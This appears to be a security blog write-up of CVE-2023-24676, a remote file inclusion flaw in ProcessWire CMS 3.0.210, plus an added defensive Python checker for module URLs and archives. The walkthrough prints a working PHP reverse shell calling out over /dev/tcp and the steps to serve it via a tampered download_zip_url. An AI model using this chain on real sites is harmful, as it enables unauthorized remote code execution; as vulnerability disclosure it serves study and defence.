CVE-2023-24676 | The Power of Remote File Inclusion in ProcessWire CMS

CUPC4K3
Apr 28, 2023

What is ProcessWire?

ProcessWire is a popular open-source content management system (CMS) written in PHP, featuring a powerful API designed to streamline development and save time. In version 3.0.210, a vulnerability was discovered that could potentially compromise the security of the CMS.

The vulnerability in version 3.0.210

To carry out the exploitation, we require a user account with administrative privileges, and the application must have debug mode activated. Once logged into the application, we navigate to the “Modules” section and select “Install.”

Upon accessing the “Modules” section, we can see a range of modules available for installation in ProcessWire. For our investigation, we specifically chose to install the Comment module by clicking on the “Install” button.

When intercepting the request using Burp Suite, we were able to identify that the “download_zip_url” parameter was blank.

Next, I created a basic reverse shell in PHP and compressed it into a zip file on my Virtual Private Server (VPS).

For reference, here is the PHP code used to create the reverse shell:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/{YOUR-IP-ADDRESS}/{YOUR-PORT} 0>&1'");
?>

Note that you need to replace “{YOUR-IP-ADDRESS}” and “{YOUR-PORT}” with your own IP address and a desired port number respectively.

To compress the “pwn.php” file into a zip archive, I used the following command:

zip plugin.zip pwn.php

This command creates a zip archive called “plugin.zip” that contains the “pwn.php” file.

To serve the compressed “plugin.zip” file to the application, I opened a Python web server by running the following command:

python3 -m http.server 8000

After setting up the Python web server, I began listening on port 443 for incoming connections. Once the application imported the “plugin.zip” file and executed the “pwn.php” file within it, we received a reverse shell of the target system. This allowed us to gain access and potentially exploit any vulnerabilities present in the system.

To inject the malicious code into the ProcessWire application, I intercepted the plugin installation request once again. This time, I inserted the URL of the VPS containing the “plugin.zip” file with the malicious “pwn.php” code.

By doing so, when the application attempted to install the plugin, it would fetch and execute the contents of the “pwn.php” file, which would establish a reverse shell connection to our listening server. This would allow us to gain unauthorized access to the target system.

We received the reverse shell successfully ;)
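
A defensive check for the install path described above, added here as an example that is not from the original article or from ProcessWire: it rejects a download_zip_url value whose host is not on an allowlist, and flags PHP files in a module archive that call process-execution functions such as exec. The allowlisted host, the function names and the sample archive are assumptions constructed for illustration.

```python
import io
import re
import zipfile
from urllib.parse import urlsplit

# Assumption: hosts trusted to serve module archives (placeholder value).
ALLOWED_HOSTS = {"modules.example.org"}

# PHP functions that start processes or evaluate code; a heuristic, not a verdict.
RISKY_CALL = re.compile(
    rb"\b(exec|shell_exec|system|passthru|popen|proc_open|eval)\s*\(", re.I)
PHP_EXT = (".php", ".phtml", ".module", ".inc")


def check_module_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return the reasons a download_zip_url value should be rejected."""
    parts = urlsplit(url)
    reasons = []
    if parts.scheme != "https":
        reasons.append("scheme is not https")
    if parts.username or parts.password:
        reasons.append("URL carries credentials")
    if (parts.hostname or "").lower() not in allowed_hosts:
        reasons.append("host is not on the allowlist")
    return reasons


def scan_module_zip(data):
    """Return (entry name, function) pairs for risky calls in PHP files of a zip."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.is_dir() or not info.filename.lower().endswith(PHP_EXT):
                continue
            for match in RISKY_CALL.finditer(archive.read(info)):
                findings.append((info.filename, match.group(1).decode().lower()))
    return findings


def build_sample_zip():
    """Constructed sample: one harmless file and one that calls exec()."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Hello.module", "<?php echo 'hello'; ?>")
        archive.writestr("pwn.php", "<?php exec('id'); ?>")
    return buf.getvalue()


if __name__ == "__main__":
    print(check_module_url("http://203.0.113.10:8000/plugin.zip"),
          scan_module_zip(build_sample_zip()))
```

Legitimate modules can also call these functions, so a finding is a prompt for manual review rather than proof of a malicious archive.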

Thanks for reading my article!

So, I just wanted to say thanks again for joining me on this journey. Here’s to more adventures in the wonderful world of hacking! Until next time, keep your firewalls strong and your code even stronger.
